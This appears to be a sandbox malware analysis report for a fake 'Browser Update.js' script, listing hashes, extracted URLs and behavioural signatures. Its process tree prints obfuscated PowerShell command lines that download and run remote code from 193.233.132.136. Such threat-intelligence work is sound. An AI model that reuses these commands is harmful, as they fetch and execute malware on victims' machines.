Analysis
-
max time kernel
115s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
19-03-2024 20:46
Static task
static1
Behavioral task
behavioral1
Sample
Browser Update.js
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Browser Update.js
Resource
win10v2004-20240226-en
General
-
Target
Browser Update.js
-
Size
606KB
-
MD5
80f7b21c47f037118ebdce07c9ad7791
-
SHA1
ea386166ac8a027a7f245cbfa357320734bbcfcc
-
SHA256
fbecd7506cbac2937c708ec38567949f550e9f0d4a0575b157dec69d9920cf57
-
SHA512
b2003629653f0a4d3402b0b10654f0bfb838d56ca3168b2e5eb29bffe814554e80c9b969cc15d6ca4e4ff8dbd223e6696a9db0d7fd0c167df412fc76a3c9d469
-
SSDEEP
1536:5+BEG+BEVB/+BEVB/+BEVB2BEhBEZBEhBEZBEhBEZBEhBENBEFEMBEFEMBEFEMB4:n
Malware Config
Extracted
http://193.233.132.136/a/z.png
Extracted
http://193.233.132.136/a/s.png
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 2 772 powershell.exe 3 2720 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 772 powershell.exe 2720 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 772 powershell.exe Token: SeDebugPrivilege 2720 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
wscript.exedescription pid process target process PID 2428 wrote to memory of 2720 2428 wscript.exe powershell.exe PID 2428 wrote to memory of 2720 2428 wscript.exe powershell.exe PID 2428 wrote to memory of 2720 2428 wscript.exe powershell.exe PID 2428 wrote to memory of 772 2428 wscript.exe powershell.exe PID 2428 wrote to memory of 772 2428 wscript.exe powershell.exe PID 2428 wrote to memory of 772 2428 wscript.exe powershell.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\Temp\Browser Update.js"1⤵
- Suspicious use of WriteProcessMemory
PID:2428 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://193.233.132.136/a/z.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2720
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://193.233.132.136/a/s.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:772
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD58009c62f8f9fb51677b950c4509fab6c
SHA1cdbbea1485ae74c36eda08d9907ea887e9d65491
SHA2569b161eb0daa9d21b33556ec1c661d75f8077c03d116951df2665fdce43fbc1d6
SHA512c6b10ffac2415fa71585e0d1dc87a5eaeba9e94a17ff355cebf9c310780d390e289c8858aaaeeaf2dcf763513464180519c9f168f2a2b193ff3d7f1151db83fd